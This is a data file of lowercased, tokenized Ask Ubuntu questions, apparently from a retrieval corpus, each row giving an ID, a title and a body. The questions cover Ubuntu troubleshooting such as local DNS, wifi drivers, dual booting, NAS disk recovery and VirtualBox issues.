385814	how can i use a local dns server ?	i need to test a few websites on my local network . i 've already setup a dns server with bind9 for my internet domains , and that works . i can also add a few domains to the /etc/hosts file , so i can test various sites with virtual name based hosting on the local machine . now , i 've to test various browsers , which means i will be on various machines ( e.g . windows for ie testing ) . i do n't want to always have to edit the hosts file on these machines . i want to use the dns server to centrally administer the domains , and just put the dns server into each machines ' config . how can i add this dns server to my ubuntu 12.04 machine , so the lookup order goes like this : hosts file my dns-server isp dns-server what i want to do is add www.something.tld or to the dns-server , and then be able to test these domains from every computer in the local network that uses this dns server ( windows , linux ) . the thing is , i do n't have www.something.tld registered , this is just for testing purposes . to make sure everything really works . basically , i want to resolve a custom domain name or host name to a 192.168.1.x address . where do i have to put my dns server for that ?
385816	how to run xbmc on second display	im just trying to get xbmc running on my tv from computer every time i start xbmc it always displays in true full screen on my monitor and leaves nothing on my tv . my tv is connected to my computer with a yellow video cable that you see on most dvd players thanks in advance
385818	hibernate is diabled on ubuntu 13.04 ?	i 'm using ubuntu 13.04 and hibernate is disabled do i need a big swap file to enable hibernate ? how ?
385819	install ubuntu 13.10	i installed ubuntu os in my lap but after installation , it showing dual os ( window , previous one & the ubuntu ) . but i do n't want the dual os . so can you please guide me to install the recommended ubuntu os in my lap . please provide me the step by step instructions , so that i can able to understand and implement it .
385820	[ solved ] unable to installing intel 5100agn driver on ubuntu 13.04 for wifi cracking	i am new to linux and wanted to know if my wifi adapter has packet injection capabilities . when i try it on ubuntu 13.04 it says my adapter does not support packet injection . but when i used ubuntu 12.10 it supported packet injection straight out of the box . hope this info helps in finding an answer to my problem . and thanks in advance : ) srry for posting answer in this post but i was n't able to post a comment via phone . so i got the answer for my question i just got iwlwifi-5000-5.ucode from ubuntu 12.10 ( /lib/firmware directory ) and moved to my new ubuntu 13.10 ( /lib/firmware directory ) and voila it worked for me . it might work for other ubuntu system hope so , this can be done by booting in a live usb and copping this file to your hard dive & further moving this file into your ubuntu 13.10/13.04 system . this was done on an acer aspire 4810t laptop which has wifi intel 5100agn
385823	how would i make this bash script that displays certain system processes related features ?	basically i need to make a bash script that acts as a handy tool for diagnosing performance issues . the script needs to first determine each unique process owner on the system , and then for each user that has current processes on the system it needs to : determine the number of processes owned by that user determine the sum of memory for all processes owned by that user ( sz ) determine the sum of the current cpu usage for all processes owned by that user ( c ) determine the cumulative time ( time ) and process name ( cmd ) of the process with the highest cumulative time owned by that user ( hog : process ) i guess the first step would be to determine all of the unique process owners on the system , and then loop through each ?
385824	unable to confige debian package using debconf	i refered how to configure debian package for creating debconf dependent debian package but its throwing errors on installation /var/lib/dpkg/info/lswhelloworld.postinst : 2 : : not found /var/lib/dpkg/info/lswhelloworld.postinst : 2 : : not found /var/lib/dpkg/info/lswhelloworld.postinst : 5 : : not found any help would be greatly appreciated .
385826	hp 2000-2d04tu notebook ( ubuntu 12.04 ) wireless internet disabled	i have a hp 2000-2d04tu notebook pc.in my system i have loaded ubuntu 12.04 but wifi is disabled in my system .
385831	use of diffrent terminals	i have searched a lot about it but could not get an answer . i read somewhere that linux ubuntu has 6 or 7 terminals . we can start them by pressing - ctrl+alt+ ( f1-f6 ) and to get back to gui- ctrl+alt+f7 so what i want to know is what is the difference between these 6 different terminals , and how can we use them as per to different purposes ? ?
385835	ca n't install unbuntu 13.10 due to insufficient available disk space	when trying to install ubuntu , on the preparing to install page , the first bubble is left unchecked . the one where it says , `` has at least 5.9 gb available drive space '' . everything else is checked , `` is plugged into a power source '' `` is connected to the internet '' . i ca n't figure out how to successfully delete any space on the disk . that 's because there is n't anything on this machine . i had windows 8 but got rid of it for ubuntu . i tried ubuntu but then it kept freezing so i tried re-installing it again , and it went crazy again . and now , after my third try , it shows this . on gparted , under partition , it shows unallocated with a size of 883.03mib . i 've tried other methods of deletion here but they all fail by using the terminal . can anyone please help ?
385849	i have just accidentally uninstalled synaptic manager . how do i install it again ?	i uninstalled it from the software center ... .once it happened , i wanted to install it again , but it shows that it is there ( weird ) . i did an update and it is gone from the ppa . how can i install it again or check if it is there or damaged ? is it really important to have the synaptic manager if i mainly use the software manager ?
385852	virtual machine : how to disable `` start '' shortcut for ubuntu ?	i 'm logged to a virtual machine of type ubuntu , using `` mstsc '' after activating xrdp . painfuly , everytime i click on the letter `` s '' the `` start menu '' would drop down . i mean by the start menu that one which contains : lock screen log out hibernate restart shut down ... i 'm unable to type the letter `` s '' in the terminal ! i have no idea about the virtual machine software they are using ( example : virtualbox , vmware , .. ) thank you a lot in advance !
385853	linux headers update breaking virtualbox folder sharing ?	i have a virtualbox running ubuntu 13.10 ( running on a 13.10 host ) that has two shared folders on the host that are mounted at boot . a while ago the guest ran some updates that broke the folder sharing , the guest could no longer see the devices to mount them . i had a hunch from reading around that it might be something to do with the guest additions , as getting the 4.3 release of virtualbox from the oracle repo and updating the guest additions solved the problem . the issue is , today 's linux headers update broke the mount again , and there does n't appear to be an updated guest additions to go to ! ( re-installing them does n't work ) . obviously at a basic level , not installing the updates would prevent this problem . however i 'd be interested in finding out exactly why it 's behaving like this . i 'm a bit out of my depth here but if someone could point me in the right direction of a solution i 'd appreciate it . if there 's more useful info i can provide let me know . full error message i 'm now getting when trying to use the manager to mount the guest additions cd image : unable to access `` vboxadditions_4.3.4_91027 '' error mounting /dev/sr0 at /media/ptinkler/vboxadditions_4.3.4_91027 : command-line 'mount -t `` iso9660 '' -o `` uheper=udisks2 , nodev , nosuid , uid=100 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sr0 '' `` /media/maplecroft/vboxadditions_4.3.4_91027 '' exited with non-zero exit stats 32 : mount : unknown filesystem type 'iso9660'
385854	how to create windows7 thin client using a ubuntu server 12.04 ?	i have seen some people creating ubuntu thin client using ltsp : i.e . a ubuntu server which has an image of ubuntu , all other diskless clients boot through the network to load the ubuntu image on the server . my scenario is that my ubuntu server acts as a router with dhcp server running on it now i need to configure the other diskless clients boot through network and load windows 7 operating system how will i do that ?
385855	squid3 stop/waiting , is this a bug ?	after i installed the squid using apt-get , the service was running , but then when i did make changes on the conf file , the service just hang squid3 stop/waiting i can not start it .
385858	gingerbread android	i am trying to install phablet on my phone which runs a gingerbread android version 2.3.7.the phone has 512 mb ram.though i followed the step by step procedure from the guide listed on the website nothing seems to be happening the phone . the final error message i get is error : insufficient permissions for device . what does this mean and what do i need to do ? i really would like to have ubuntu on my phone , but i am not a developer to understand all the technical commands.please help me .
385859	webmin packages update	i 'm running ubuntu server 13.10 + webmin 1.660 . since i have upgraded from 13.04 to 13.10 , webmin do n't detect any package update anymore . in console when i run `` apt-get upgrade '' , i have some packages to upgrade , linux headers inclusive , but for webmin `` all installed packages are up to date '' . what can i do to solve this ? ? ? thanks in advance .
385862	failed to open stream	my problem is that when i send my php file as root to the htdocs directory it appears as this . root mustafa # sudo cp programa.php /opt/lampp/htdocs/archivos the php file appears with a big x on top , and when i try to execute it from xampp it says : warning : unknown : failed to open stream : permiso denegado in unknown on line 0 fatal error : unknown : failed opening required '/opt/lampp/htdocs/examen/registro.php ' ( include_path= ' . : /opt/lampp/lib/php ' ) in unknown on line 0
385865	how to restore previous tabs in firefox when edit > preferences is ok	i installed wavemaker which 'reset ' firefox preferences . however , firefox still does n't load previous tabs even though i set edit > preferences to `` show my windows & tabs from last time '' & it still retains this on reloading . there must be some other setting in firefox which impacts this . any ideas ?
385866	how can i make hybrid ircd flood protection more relaxed or disable it entirely ?	i 'm running a server on an internal network and connect a few bots to it and sometimes the bots will spit out a lot of lines . i 've made the bots reconnect after being kicked but that 's merely treating the symptoms . how can i make the flood protection more relaxed/disable it ? my install is pretty much out of the box by the way .
385870	page formatting error in bluej	when i print a program in bluej , even if i set page to a4 size.all the program comes out in a weird small box . the same goes when i try to print any output of any program . its the same box of the same size no matter what format i set the page to ...
385872	getting error sudo : pam_authenticate : module is unknown	i am new to ubuntu and have installed ubuntu 12.04.3 on my laptop . i need to install vas on it but when i do i get the error : sudo : pam_authenticate : module is unknown . and i can not make any other changes . anything that requires sudo i get this error . also you can not logon remotely to the box . these are the packages installed for pam . can you tell me what module i am missing ? ? # dpkg -- get-selections | grep -i pam libpam-modules install libpam-modules-bin install libpam-runtime install libpam0g install python-pam install
385873	no wireless drivers installed ? how do i install them ?	apparently when i installed 12.04 i was not online and no wireless drivers were installed - if i connect a cable i do get internet access . this is a b590 lenovo laptop . when i type in lspci i get this : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) in case that helps at all
385874	mobilepartner not recognizing the huawei e1750 modem on ununtu 13.10	i have huawei e1750 usb mode with mobilepartner ( dialer ) installed on ubuntu 13.10 . problem is it that the dialer is not recognizing the modem after plugging into the computer . in ubuntu 13.04 , it was working fine . i can connect it using wvdial , but i ca n't switch the modem between 2g and 3g mode . any idea how to make mobile partner recognize the modem or how to switch it 's mode between 2g and 3g using command line .
385885	how to replace grub with windows 8.1 default boot manager ?	i have a windows pc that is running windows 8.1 and today i installed ubuntu 13.10 alongside with windows , however ubuntu seem to replace the default boot manager with grub .
385888	printing 2 sides per page does not work anymore since update to 13.10	i used to often print documents with 2 pages per side to save paper . since i have updated to ubuntu 13.10 , this no longer works properly . the problem seems to be with the rotation . because if i select 4 pages per side , which does not involve rotation , things are fine . the problem exists at least when printing from evince , libreoffice and gedit . with evince , the problem can be circumvented by requesting a preview first . the preview is fine and can then be printed . in gedit however , the preview shows only one page per side , although rotated correctly . there is no option to print from the preview . i have verified the problem on two workstations , one with a clean install of 13.10 and one upgraded from 13.04 . and on 2 printers , both brother . an mfc-7440n and an hl4150cdn . can anyone verify this problem ? or better yet , tell me how to fix it ?
385891	iomega home media disk corruption - data recovery help asked	hello ubuntu members ... i have since yesterday a problem with a iomega home media network hard drive ( hmnhd ) that used to work for over 2 years now . this resulted after a general power outage and i believe that this corrupted the hard drive os resulting in having no more access to the files . there are critical files i need to restore ( they were put on the drive last week and had not been `` copied '' yet to a second nas because the saving cycle that runs every 2 weeks was due to run today ( too late ! ! ! ) i did several tests before coming here for help , as i think the hard drive seagate 1 to sata ) is not yet failing but corrupted data is in cause ... here is where i got to : running under windows several softs , gives me following information : - disk is running gpt-efi . - ease us : sees 7000 files and can restore them , but several gz files are splitted ( see below reasons ) - testdisk sees gpt-efi disk type , and indicates : current partition structure : partition start end size in sectors 1 p linux raid 65536 42008576 41943041 [ primary ] [ md0 ] no fat , ntfs , ext2 , jfs , reiser , cramfs or xfs marker 2 p ms data 42008584 1953525106 1911516523 [ primary ] 2 p ms data 42008584 1953525106 1911516523 [ primary ] and after a quick analyse : disk /dev/sdc - 1000 gb / 931 gib - chs 121601 255 63 partition start end size in sectors > p linux lvm 65536 42008447 41942912 p linux raid 42008448 42008575 128 [ md0 ] linux raid 42008584 42008591 8 [ hmnhd-tid0ym:1 ] linux lvm 42008584 1953524999 1911516416 as you can see there is a linux raid partition which could explain why ease us in not able to recover data ( gz files splitted ) ... testdisk was not able after 14 hours to recover data ans was still analysing disk . i decided to switch to ubuntu live-cd and try to recover what i could ( i have done this for other disks and this used to work well ) so here we go : ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00008000 device boot start end blocks id system /dev/sdc1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . ok gpt type.. lets go on with gdisk ubuntu @ ubuntu : ~ $ sudo gdisk /dev/sdc gpt fdisk ( gdisk ) version 0.8.7 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . command ( ? for help ) : x expert command ( ? for help ) : p disk /dev/sdc : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 38db39c4-87f0-43aa-be1e-fb226b221093 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 8-sector boundaries total free space is 65537 sectors ( 32.0 mib ) number start ( sector ) end ( sector ) size code name 1 65536 42008576 20.0 gib fd00 primary 2 42008584 1953525106 911.5 gib 0700 primary expert command ( ? for help ) : o disk size is 1953525168 sectors ( 931.5 gib ) mbr disk identifier : 0x00008000 mbr partitions : number boot start sector end sector status code 1 1 1953525167 primary 0xee expert command ( ? for help ) : i partition number ( 1-2 ) : 1 partition guid code : a19d880f-05fc-4d3b-a006-743f0f84911e ( linux raid ) partition unique guid : 997e0df2-00c2-469a-a5bb-bdd3cc676b73 first sector : 65536 ( at 32.0 mib ) last sector : 42008576 ( at 20.0 gib ) partition size : 41943041 sectors ( 20.0 gib ) attribute flags : 0000000000000000 partition name : 'primary' expert command ( ? for help ) : i partition number ( 1-2 ) : 2 partition guid code : ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 ( microsoft basic data ) partition unique guid : c76d7285-4231-45ce-87e2-504ff9d8110f first sector : 42008584 ( at 20.0 gib ) last sector : 1953525106 ( at 931.5 gib ) partition size : 1911516523 sectors ( 911.5 gib ) attribute flags : 0000000000000000 partition name : 'primary' expert command ( ? for help ) : v no problems found . 65537 free sectors ( 32.0 mib ) available in 3 segments , the largest of which is 65502 ( 32.0 mib ) in size . i tried to mount /dev/sdc2 with several types and all i get is the following : ubuntu @ ubuntu : ~ $ sudo mount /dev/sdc2 /media/external/ mount : unknown filesystem type 'linux_raid_member' ubuntu @ ubuntu : ~ $ sudo mount -t ext2 /dev/sdc2 /media/external/ mount : wrong fs type , bad option , bad superblock on /dev/sdc2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i need to access these files and recover them , what can i do now or how can i proceed ... thanks by advance to support community for your advices ... tdldp
385893	how to install lineakd in ubuntu 13.10	any ideas how to install lineakd in ubuntu 13.10 ? it looks like the package was available for lucid but i cant find it for saucy . thanks-
385896	new problem to restore with aptoncd on ubuntu 13.04 64bit except hal !	i installed hal sudo apt-get install hal but i have new problem ! first i open `` aptoncd '' in terminal and clicked on `` restore '' .. now i clicked on `` load '' but i get this mohsen @ mohsen-thinkpad-r500 : ~ $ aptoncd traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/aptoncd/restore/restorewindow.py '' , line 205 , in on_btnloadfrom bus = dbus_helper.devicelist ( ) file `` /usr/lib/python2.7/dist-packages/aptoncd core/dbus_helper.py '' , line 26 , in __init__ self.hal_object = self.bus.get_object ( 'org.freedesktop.hal ' , '/org/freedesktop/hal/manager ' ) file '' /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) **dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1** anybody help ? : )
385899	can not boot usb livecd - boots to grub2 instead	recently i decided to reinstall ubuntu on my laptop . because my laptop has no cd drive , i am stuck using a usb . so , i inserted the disk , pressed f12 to bring up the boot menu , and selected the usb hdd . however , the computer then booted to grub2 instead . i have also tried changing the boot order and booting usb hdd , usb fdd , and usb cd from the windows boot device menu . nothing has worked . all has gone to grub2 instead . what can i do ? i have done this before on my laptop , but have never run into the problem . in case you need to know , the model is a lenovo thinkpad x131e . thanks for any help ; i really need it .
385901	how to see more lines in the terminal	i 'm installing a package and get a load of errors and need to be able to read through all the error messages that come up . unfortunately the terminal will only display a finite number of lines . how do i go about viewing previous lines or changing the maximum number of lines that can be displayed ?
385907	ppd or drivers for tvs speed 40 plus printer	i want ppd or drivers for tvs speed 40 plus printer . can you please help for this ? thanks in advance , purushottam aher
385910	which ubuntu version is for lenovo z500 with i5- ?	which version of ubuntu ( 13.10 or 12 ) i should install ? your help would be great ! dps just clicking on about this compute to open
385913	is it possible to re-detect an unreliable , plugged in usb device ?	given a `` ganged power switching '' capable active usb2.0 hub , and - amongst other usb devices - an external hdd is attached to it . most probably the electronics or the firmware of the external hdd has some issues , and every time it has its random glitch the system does n't recognize the hdd anymore . i mean , lsusb does n't list it anymore , however at least the disk is still spinning . my question is that is there any software based way to make the hdd re-recognized , while the other devices in the hub remain untouched ? some way that simulates as if i plugged the hdd right now into a particular port , replaying the needed handshake usually done when i plug in an usb harware ( i assume there must be some protocol , but unfortunately i do n't speak usb ) . it implies that the following approaches are dead ends within the above context : * changing the usb hub to a per port power switching ( hw based solution ) * changing the hdd to a reliable one ( hw based solution ) * plug out and back into the hub the hdd ( hw based solution ) * using usbreset or similar ( will have impact on the other plugged in devices too , since i have a ganged power switching capable hub ) * playing with the usb related kernel modules ( will have impact on the other plugged in devices too ) worst case i can buy another hub to put that between the original hub and the unreliable device ( s ) of course . but until that it is still an interesting question whether the above operation is possible at all . thank you in advance ! cheers
385915	how to save all kvm-guests on shut down or restart ?	i wrote a short script which was supposed to save the state of all my running kvm-machines ( save-vms.sh ) : # ! /bin/sh suspend_vms ( ) { for output in $ ( virsh list -- state-running -- uuid ) do exec virsh managedsave $ output -- bypass-cache done } case `` $ 1 '' in start ) # no-op ; ; restart|reload|force-reload ) echo `` error : argument ' $ 1 ' not supported '' > & 2 exit 3 ; ; stop ) suspend_vms ; ; * ) echo `` usage : $ 0 start|stop '' > & 2 exit 3 ; ; esac : i placed it into /etc/init.d and tested with service save-vms.sh stop as well as sudo service save-vms.sh stop . it worked in both cases , but when i add a link to rc0.d and rc6.d ( name : k01save-vms ) so that it gets executed on shutdown and restart it does n't seem to work . any ideas what might be wrong or where i could find some logs which would point me in the right direction ? thank you !
385919	ubuntu-windows 7 dual boot , windows broken	and i 'm considering reinstalling windows 7 , should i remove ubuntu beforehand ? http : //answers.microsoft.com/en-us/windows/forum/windows_7-system/black-screen-before-login-after-installing/ca7e7876-1b1d-4cd1-aceb-d69a8eafdd10
385922	eduroam wireless network not detected	eduroam ( the university network ) is n't detected by my laptop ( ubuntu 12.4 ) . wireless is on and it does detect other wireless networks . eduroam does n't show up as an option . ( it does show up on my android phone and my collegue 's windows laptops and ipads ) i 've tried adding it manually ( checked the security settings several times now ) and connecting to it through 'connect to hidden wireless network ' but this does n't work . it asks for the ca certificate , i select that there is none and not to ask again and it asks me for authentication . i enter my university log-in information and press 'connect ' . it then keeps trying to connect for a while , but fails . any ideas why eduroam does n't show up in my list of available networks ?
385924	is there a gui for youtube-dl ?	youtube-dl is advanced but it lacks a good gui . i personally ca n't use such a program without a gui . something similar to ytd downloader will be good . i need it to have a progress bar and other quality control option . ability to download multiple videos at a time would be good too . also please do n't suggest flareget or minitube .
385928	wifi stops always after a few minutes	i bought a new laptop ( gigabyte p34g ) but have ugly problems with my wifi connection on ubuntu 13.10 . wifi works a few minutes before loosing the connection . sudo service network-manager restart helps for the next few minutes but it 's making me crazy to do this all 5 minutes . can anybody give me a helping hand with this problem ?
385933	`` apt.conf file was not found . '' when installing using wubi	whenever i install ubuntu from the wubi installer in windows , it takes a long time ( 2hours ) to copy the installation logs and still copying . when i abort the process and enter into the os , apt.conf file was not found .
385934	unable to mount usb hard drive	my computer is currently running elementary os ( i know it 's not ubuntu but i want to install ubuntu but need to backup files first before doing so ) and is unable to mount my lacie p'9233 ( http : //www.lacie.com/uk/products/product.htm ? id=10587 ) 4tb hard drive . it can be read no problem at all on my mothers laptop running an up-to-date version of ubuntu ( i think 13.10 but did not check ) . since it can be read no problem at all on my mothers laptop i would assume the problems are specific to my setup . the drive is formatted to ntfs and windows can not read it either so this makes me think this could be some sort of system related issue such as the bios or my usb ports . running 'fdisk -l ' reveals nothing and neither does 'dmesg' any help is greatly appreciated although if it comes to it i can backup what i want via sftp , scp , rsync , etc ( although i 'd rather not do this ) . edit : here 's some terminal output : dmesg|tail : [ 60.619849 ] usb 2-1.5 : product : usb2.0 hub [ 60.620238 ] hub 2-1.5:1.0 : usb hub found [ 60.620436 ] hub 2-1.5:1.0 : 4 ports detected [ 61.017380 ] usb 2-1.5.3 : new low-speed usb device number 7 using ehci-pci [ 61.112965 ] usb 2-1.5.3 : new usb device found , idvendor=192f , idproduct=0416 [ 61.112971 ] usb 2-1.5.3 : new usb device strings : mfr=0 , product=2 , serialnumber=0 [ 61.112975 ] usb 2-1.5.3 : product : usb optical mouse [ 61.115776 ] input : usb optical mouse as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5.3/2-1.5.3:1.0/input/input9 [ 61.116089 ] hid-generic 0003:192f:0416.0002 : input , hidraw0 : usb hid v1.11 mouse [ usb optical mouse ] on usb-0000:00:1d.0-1.5.3/input0 [ 67.999022 ] systemd-hostnamed [ 3753 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00044ed7 device boot start end blocks id system /dev/sdb1 4094 1122476031 561235969 5 extended /dev/sdb2 * 1733931008 1945808895 105938944 7 hpfs/ntfs/exfat /dev/sdb3 1945808896 1953523711 3857408 82 linux swap / solaris /dev/sdb4 1122476032 1124573183 1048576 82 linux swap / solaris /dev/sdb5 4096 10489855 5242880 82 linux swap / solaris /dev/sdb6 10491904 73897983 31703040 83 linux /dev/sdb7 73900032 1122476031 524288000 83 linux partition table entries are not in disk order disk /dev/sdc : 15.7 gb , 15724707840 bytes 64 heads , 32 sectors/track , 14996 cylinders , total 30712320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cdee1 device boot start end blocks id system /dev/sdc1 * 32 30711807 15355888 c w95 fat32 ( lba ) lsusb : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 006 : id 0a05:7211 bus 002 device 004 : id 0951:1689 kingston technology bus 002 device 007 : id 192f:0416 avago technologies , pte . blkid : /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' 338fc3fa68b7f8d1 '' type= '' ntfs '' /dev/sdb2 : uuid= '' 0a68d9bd68d9a7a9 '' type= '' ntfs '' /dev/sdb3 : uuid= '' 0dca231b-c61d-4379-aebc-a75a1a9ed3ed '' type= '' swap '' /dev/sdb4 : uuid= '' 30fa0e15-168d-4c6a-966e-cd407756dabe '' type= '' swap '' /dev/sdb5 : uuid= '' 3206b337-5779-4b27-8f59-548ce3f46da4 '' type= '' swap '' /dev/sdb6 : uuid= '' 0ce07eee-b7d9-46a4-a108-dee6c3570ecb '' type= '' ext4 '' /dev/sdb7 : uuid= '' 8b3ffb3f-60bc-4b9f-84bd-f8231161bee6 '' type= '' ext4 '' /dev/sdc1 : uuid= '' 01d4-d66d '' type= '' vfat '' since i 'm still trying to get my computer to recognize the drive in case it matters ( i 'd imagine it does ) my motherboard is an asrock h55m-ge r2.0 ( http : //www.asrock.com/mb/intel/h55m-ge % 20r2.0/ ) perhaps there are some specific bios settings i need enabled ( or disabled ) either way i 'm still struggling with this and am starting to think my drive might not be supported : ( if you can , please help ...
385935	windows 7 not working after installing linux	i recently tried installing ubuntu onto an external hard drive and if messed up my mbr . the first time i did it i was able to fix the mbr using my windows 7 install disc . now when i try to use the install disc i have no luck in getting the disc to even load . when i boot to the disc , it gives me the prompt to press any key to use the dvd to boot and then it goes into the grub loader error . i have attached a link to my pastebin http : //paste.ubuntu.com/6519406/ thanks for the help .
385936	ubuntu 13.10-desktop does n't detect wi-fi adapter under vmware	i 'm new in linux at all and i just installed ubuntu on virtual machine . the problem is that there is no wi-fi network . on cable no problems but when i unplug lan cable there is no wi-fi . so far i tryed to 'software update ' but i do n't see update for wifi driver or something . what can be the problem ? can you point me what and where to check ? edit : this happen also on real not virtual machine . laptop is dell vustro 1500 . only wired network and no wireless ?
385943	how to install a single package from launchpad	how do i download and install a proposed ubuntu package from launchpad ? i am technical but not that technical so if you could give me a hint it would be much appreciated . to give you a background on this , i am affected by a very annoying issue where my menus become unresponsive ( see unity menu very slow and unresponsive ) , and it happens on both my main machines -terrible bug if you ask me . this issue renders ubuntu unusable at times , and i 've read on that same page that a fix might be available in the new gtk3 package ( 3.8.6 ) . many thanks
385945	is it possible to boot the same ubuntu sometimes as a virtual machine , and sometimes on the physical pc ?	is it at all possible to have the same ubuntu with the same updates and installed apps , sometimes boot in a vmware/vbox/or-similar inside windows , and sometimes be able to boot it on the startup of the computer ? without having to migrate from one place to another each time .
385948	how to increase ubuntu partition size from inside ubuntu	i have ubuntu 12.04 installed alongside windows 8. i gave only 15 gb partition to ubuntu while installing . now i need more space as 15gb is too less . is there any way that i can increase my ubuntu partition space so that i dont need to install ubuntu all over again . thanks in advance . i have this link http : //www.howtogeek.com/114503/how-to-resize-your-ubuntu-partitions/ should i try this or there is some other way .
385952	acer aspire 4810tz overheat problem	my notebook acer aspire 4810tz is overheating on ubuntu 13.10 ( 64bit ) . i use just google chrome or firefox and small aps like empathy or skype ... my machine has integrated intel graphic card and second dedicated mobility radeon hd 4330 ( i have not installed drivers for it , update centre has not offered them ) . any suggestions how to deal with it ? p.s . tlp is already installed , but it does not help ... . p.s.s . i have switched of radeon dedicated video card in bios , but it did not solve the problem ; ( system info : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m-e lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710/m92 [ mobility radeon hd 4330/4350/4550 ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] rv710/730 hdmi audio [ radeon hd 4000 series ] 02:00.0 ethernet controller : qualcomm atheros ar8131 gigabit ethernet ( rev c0 ) 